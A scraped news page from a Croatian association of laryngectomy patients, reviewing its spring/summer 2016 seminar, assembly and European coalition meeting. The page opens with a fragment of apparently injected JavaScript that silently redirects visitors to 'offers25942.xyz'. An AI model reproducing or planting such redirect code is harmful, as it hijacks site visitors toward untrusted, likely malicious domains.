{ window.location.replace('http://offers25942.xyz/'); }, delay);})();single single-post postid-2391 single-format-standard et_pb_button_helper_class et_fullwidth_nav et_fixed_nav et_show_nav et_cover_background et_pb_gutter et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns3 et_header_style_left et_pb_pagebuilder_layout et_smooth_scroll et_right_sidebar et_divi_theme gecko et_minified_js et_minified_css">
Početna stranica » Arhiva događanja » Događanja » Pregled događanja proljeće/ljeto 2016.

Pregled događanja proljeće/ljeto 2016.

kol 2, 2016

Tijekom proljeća započele su pripreme za XI. seminar nadomjesnog govora i psihoonkološkog snaženja u Thalassotherapiji – Crikvenica.

 

Zagrebački klub je kroz IT radionicu pod vodstvom Ivane Crnković osposobio 4 člana u korištenju računalom.

 

Zagrebački “Optimisti” su gostovali na “Otvorenim danima” ORL klinike u Zenici (BiH) medijski vrlo zapaženim koncertom pod ravnanjem mr.sc. Tamare Živković Ivanović.

Vrlo uspješan bio je i XI. intenzivni međunarodni seminar nadomjesnog govora:

 

U Crikveničkoj Thalassotherapiji je od 19. do 25. lipnja proveden naš tradicionalni XI. seminar, u kojem su sudjelovala 73 člana iz Hrvatske i susjednih zemalja.

 

Inovativni stručni program, zaslugom stručnog tima na čelu sa mr.sci. Tamarom Živković Ivanović pokazao se vrlo korisnim, a bio je usmjeren ka održavanju traheostome nakon laringektomije.

 

Glavna sestra ORL klinike KBC Rebro Blaženka Ferenčak držala je seminar i treninge, što se pokazala vrlo korisnim, osobito korisnicima govornih proteza.

 

Intenzivni program predavanja o operacijama i korištenju pomagala nakon devastirajućih operacija zloćudnih tumora grla polučio je veliki interes i podigao razinu kao i kvalitetu saznanja operiranih o svojem stanju. Društveni program je također polučio sjajan rezultat pa su sve grupe na kraju seminara pokazale usvojene vještine.

 

Održana je i delegatska Izvještajna skupština HZL-a 23. lipnja, na kojoj su istaknuti uspješni već 10-godišnji rezultati rada u 11 klubova.

 

Zaključeno je da se i dalje radi na proširenju broja klubova, kao i podružnica radi dostupnosti članstvu izvan većih centara. Spominju se i savjetovališta, kao korisna.

 

Iduća će godina proći u obilježavanju 10. obljetnice HZL, koja je utemeljena još 2007.godine! Prvi je puta upriličen i dvokratni izlet brodom na otok Krk, zahvaljujući razmjevanju obitelji našeg člana i sudionika seminara g. Krune Domijana.

 

U skladu se nastojanjima za boljim međunarodnim povezivanjem, osim preko Lige za borbu protiv raka, radi se na obnovi Europske koalicije laringektomiranih (C.E.L.).

 

Od 12. do 14. srpnja održana je konferencija posvećena obnovi C.E.L.-a u Bad Reichenhallu (Njemačka). Predstavnici Slovenije (S.Ribaš i I.Košak), Vojvodine (P.Mudri), Njemačke (W. Semeniuk, Silke Foesges, E. Neuman, Heinz Koch), Austrije (P. i G.Maly), Norveške (Nja Tjörnbon) i Hrvatske (M. Manestar) utemeljili su tročlanu radnu grupu, koja će u roku od 6 mjeseci predložiti održivi koncept nove Europske organizacije operiranih na grlu.

 

Članovi radne grupe su: Ivan Košak, predsjednik DLS, Petar Mudri, predsjednik Vojvođanskog kluba i Nja Tjörnbon, predsjednik Norveške udruge.

 

Napominjemo da se naziv „laringektomirani“ pokušava u Europi zamijeniti nazivom „Operirani na grlu“, kako bi se otvorilo vrata svima, koji nisu samo laringektomirani!

Print Friendly, PDF & Email